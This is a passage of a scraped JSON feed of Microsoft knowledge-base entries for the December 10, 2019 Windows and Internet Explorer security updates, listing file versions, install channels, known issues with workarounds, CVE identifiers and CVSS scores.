21-Nov-2019| 20:59| x64 \nUrl.dll| 9.0.8112.21392| 237,056| 21-Nov-2019| 20:59| x64 \nIeframe.dll| 9.0.8112.21392| 10,943,488| 21-Nov-2019| 21:04| x64 \nIeui.dll| 9.0.8112.21392| 248,320| 21-Nov-2019| 20:55| x64 \nIeinstal.exe| 9.0.8112.21392| 490,496| 21-Nov-2019| 20:59| x64 \nInetres.adml| Not applicable| 393,813| 21-Nov-2019| 21:31| Not applicable \nInetres.admx| Not applicable| 1,601,204| 27-Apr-2018| 17:14| Not applicable \nJsdebuggeride.dll| 9.0.8112.21392| 141,312| 21-Nov-2019| 20:59| x64 \nJscript.dll| 5.8.7601.21377| 824,832| 21-Nov-2019| 20:59| x64 \nJscript9.dll| 9.0.8112.21392| 2,359,296| 21-Nov-2019| 21:07| x64 \nVbscript.dll| 5.8.7601.21377| 583,168| 21-Nov-2019| 20:59| x64 \nIexplore.exe| 9.0.8112.21392| 751,728| 21-Nov-2019| 20:07| x86 \nIeunatt.exe| 9.0.8112.21392| 142,848| 21-Nov-2019| 19:41| x86 \nUrlmon.dll| 9.0.8112.21392| 1,141,248| 21-Nov-2019| 19:43| x86 \nInetcpl.cpl| 9.0.8112.21392| 1,427,968| 21-Nov-2019| 19:41| Not applicable \nJsproxy.dll| 9.0.8112.21392| 75,776| 21-Nov-2019| 19:41| x86 \nWininet.dll| 9.0.8112.21392| 1,132,032| 21-Nov-2019| 19:42| x86 \nWininetplugin.dll| 1.0.0.1| 66,048| 21-Nov-2019| 19:41| x86 \nTdc.ocx| 9.0.8112.21392| 63,488| 21-Nov-2019| 19:40| x86 \nIedvtool.dll| 9.0.8112.21392| 678,912| 21-Nov-2019| 19:42| x86 \nDxtmsft.dll| 9.0.8112.21392| 354,304| 21-Nov-2019| 19:40| x86 \nDxtrans.dll| 9.0.8112.21392| 223,744| 21-Nov-2019| 19:40| x86 \nMsfeeds.dll| 9.0.8112.21392| 607,744| 21-Nov-2019| 19:41| x86 \nMsfeeds.mof| Not applicable| 1,518| 21-Nov-2019| 19:14| Not applicable \nMsfeedsbs.dll| 9.0.8112.21392| 41,472| 21-Nov-2019| 19:40| x86 \nMsfeedsbs.mof| Not applicable| 1,574| 21-Nov-2019| 19:14| Not applicable \nMsfeedssync.exe| 9.0.8112.21392| 10,752| 21-Nov-2019| 19:40| x86 \nMshta.exe| 9.0.8112.21392| 11,776| 21-Nov-2019| 19:40| x86 \nHtml.iec| 2019.0.0.21377| 367,616| 21-Nov-2019| 19:45| Not applicable \nMshtmled.dll| 9.0.8112.21392| 72,704| 21-Nov-2019| 19:40| x86 \nMshtml.dll| 9.0.8112.21392| 12,844,032| 21-Nov-2019| 19:50| x86 \nMshtml.tlb| 9.0.8112.21392| 2,382,848| 21-Nov-2019| 19:40| Not applicable \nIelowutil.exe| 9.0.8112.21392| 223,232| 21-Nov-2019| 19:41| x86 \nIeproxy.dll| 9.0.8112.21392| 195,072| 21-Nov-2019| 19:41| x86 \nIeshims.dll| 9.0.8112.21392| 194,560| 21-Nov-2019| 19:41| x86 \nExtexport.exe| 9.0.8112.21392| 22,528| 21-Nov-2019| 19:41| x86 \nJsdbgui.dll| 9.0.8112.21392| 388,096| 21-Nov-2019| 19:41| x86 \nIertutil.dll| 9.0.8112.21392| 1,808,384| 21-Nov-2019| 19:41| x86 \nSqmapi.dll| 6.0.6000.16386| 142,960| 21-Nov-2019| 20:09| x86 \nVgx.dll| 9.0.8112.21392| 769,024| 21-Nov-2019| 19:41| x86 \nUrl.dll| 9.0.8112.21392| 231,936| 21-Nov-2019| 19:41| x86 \nIeframe.dll| 9.0.8112.21392| 9,757,696| 21-Nov-2019| 19:45| x86 \nIeui.dll| 9.0.8112.21392| 176,640| 21-Nov-2019| 19:39| x86 \nIeinstal.exe| 9.0.8112.21392| 474,624| 21-Nov-2019| 19:41| x86 \nJsdebuggeride.dll| 9.0.8112.21392| 104,448| 21-Nov-2019| 19:41| x86 \nJscript.dll| 5.8.7601.21377| 740,352| 21-Nov-2019| 19:41| x86 \nJscript9.dll| 9.0.8112.21392| 1,819,648| 21-Nov-2019| 19:48| x86 \nVbscript.dll| 5.8.7601.21377| 433,152| 21-Nov-2019| 19:41| x86 \n \n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## References\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "Cumulative security update for Internet Explorer: December 10, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "KB4530677", "href": "https://support.microsoft.com/en-us/help/4530677", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:27:07", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**IMPORTANT** Customers who have [purchased](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) the Extended Security Update (ESU) for on-premises versions of some operating systems must follow specific procedures to continue receiving security updates after extended support ends on January 14, 2020. For more information, see KB4522133.\n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1:**Note **The notification will not appear on domain-joined machines or machines in kiosk mode.\n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. For more information, see[ How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Input and Composition, Windows Virtualization, Windows Kernel, Windows Peripherals, and Windows Server.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update****Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) (KB4490628). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\n 2. The latest SHA-2 update (KB4474419) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. For more information on SHA-2 updates, see 2019 SHA-2 Code Signing Support requirement for Windows and WSUS.\nAfter installing the items above, Microsoft strongly recommends that you install the _latest _SSU (KB4531786). If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530692>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4530692](<https://download.microsoft.com/download/d/8/4/d84af77d-cd59-46d6-a5ad-c83effa42882/4530692.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530692 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T08:00:00", "id": "KB4530692", "href": "https://support.microsoft.com/en-us/help/4530692", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:27:02", "description": "None\n**Reminder** The additional servicing for Windows 10 Enterprise, Education, and IoT Enterprise editions ended on April 9, 2019 and doesn't extend beyond this date. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.\n\n**Reminder **March 12 and April 9 were the last two Delta updates for Windows 10, version 1607. For Long-Term Servicing Branch (LTSB) customers, security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our [blog](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426>).\n\n_Windows 10, version 1607, reached end of service on April 10, 2018. Devices running Windows 10 Home or Pro editions will no longer receive monthly security and quality updates that contain protection from the latest security threats. __To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10._**IMPORTANT**Windows 10 Enterprise and Windows 10 Education editions will receive additional servicing at no cost until April 9, 2019. Devices on the Long-Term Servicing Channels (LTSC) will continue to receive updates until October 2026 per the [Lifecycle Policy page](<https://support.microsoft.com/lifecycle/search?alpha=Windows%2010>). Windows 10 Anniversary Update (v. 1607) devices running the Intel \u201cClovertrail\u201d chipset will continue to receive updates until January 2023 per the [Microsoft Community blog](<https://answers.microsoft.com/windows/forum/windows_10-windows_install/intel-clover-trail-processors-are-not-supported-on/ed1823d3-c82c-4d7f-ba9d-43ecbcf526e9?auth=1>).\n\n_Windows Server 2016 Standard edition, Nano Server installation option and Windows Server 2016 Datacenter edition, Nano Server installation option __reached end of service on October 9, 2018_._ These editions will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10._\n\n_Windows 10 Mobile, version 1607, reached end of service on October 8, 2018. Devices running Windows 10 Mobile and Windows 10 Mobile Enterprise will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10._\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using external devices (such as game controllers and web cameras).\n * Updates to improve security when using input devices such as a mouse, keyboard, or stylus.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default behavior in ASP.NET for the SameSite cookie header to align with changes other industry partners are making. For more information, see [Work with SameSite cookies in ASP.NET](<https://docs.microsoft.com/en-us/aspnet/samesite/system-web-samesite>).\n * Security updates to Windows Server, Windows Peripherals, Windows Kernel, Windows Virtualization, the Microsoft Scripting Engine, and Windows Input and Composition.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4467684, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.| Set the domain default \"Minimum Password Length\" policy to less than or equal to 14 characters.Microsoft is working on a resolution and will provide an update in an upcoming release. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, you might encounter issues with applications that use embedded HTML and SameSite cookies across sites or iframes.| To align with industry partners, the default behavior of the SameSite cookie header in ASP.NET has been changed. To mitigate this issue, see [Work with SameSite cookies in ASP.NET](<https://docs.microsoft.com/en-us/aspnet/samesite/system-web-samesite>). \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date>).If you are using Windows Update, the latest SSU (KB4520724) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530689>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4530689](<https://download.microsoft.com/download/7/2/7/727ad10a-cd59-44c4-abc9-3aa5eb69f12f/4530689.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530689 (OS Build 14393.3384)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "KB4530689", "href": "https://support.microsoft.com/en-us/help/4530689", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:27:10", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Security updates to Windows Virtualization, Windows Kernel, Windows Peripherals, and Windows Server.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. If you are using Windows Update, the latest SSU (KB4524445) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530730>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4530730](<https://download.microsoft.com/download/8/a/f/8af75e3a-fb84-4b3a-855f-c6617c2ec507/4530730.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530730 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T08:00:00", "id": "KB4530730", "href": "https://support.microsoft.com/en-us/help/4530730", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:27:07", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Input and Composition, Windows Virtualization, Windows Kernel, Windows Peripherals, and Windows Server.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4532920) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530698>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n**File information**For a list of the files that are provided in this update, download the [file information for update 4530698](<https://download.microsoft.com/download/b/4/7/b47828ef-25e7-488a-8474-6612cfbb598d/4530698.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530698 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T08:00:00", "id": "KB4530698", "href": "https://support.microsoft.com/en-us/help/4530698", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:27:09", "description": "None\n**IMPORTANT** Customers who have [purchased](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) the Extended Security Update (ESU) for on-premises versions of some operating systems must follow specific procedures to continue receiving security updates after extended support ends on January 14, 2020. For more information, see KB4522133\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Input and Composition, Windows Virtualization, Windows Kernel, and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update****Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) (KB4493730). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\n 2. The latest SHA-2 update (KB4474419) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. For more information on SHA-2 updates, see 2019 SHA-2 Code Signing Support requirement for Windows and WSUS.\nAfter installing the items above, Microsoft strongly recommends that you install the _latest _SSU (KB4531787). If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530719>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4530719](<https://download.microsoft.com/download/f/3/7/f37baade-e302-410d-bac1-cafba3066596/4530719.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530719 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T08:00:00", "id": "KB4530719", "href": "https://support.microsoft.com/en-us/help/4530719", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:27:01", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**What's new for Windows 10, version 1909 and Windows 10, version 1903 release notes**Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an _enablement package_, which is a small, quick-to-install \u201cmaster switch\u201d that simply activates the Windows 10, version 1909 features.To reflect this change, the release notes for Windows 10, version 1903 and Windows 10, version 1909 will share an update history page. Each release page will contain a list of addressed issues for both 1903 and 1909 versions. Note that the 1909 version will always contain the fixes for 1903; however, 1903 will not contain the fixes for 1909. This page will provide you with the build numbers for both 1909 and 1903 versions so that it will be easier for support to assist you if you encounter issues.For more details about the enablement package and how to get the feature update, see the [Windows 10, version 1909 delivery options](<https://aka.ms/1909mechanics>) blog.\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 1909\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 1903.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 1903\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18362.1042) released December 10, 2019. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that might cause error 0x3B in **cldflt.sys** on some devices.\n * Addresses an issue that might prevent you from creating a local user account using the Input Method Editor (IME) for Chinese, Japanese, or Korean languages. This issue occurs when setting up a new Windows device during the Out of Box Experience (OOBE).\n * Security updates to Windows Virtualization, 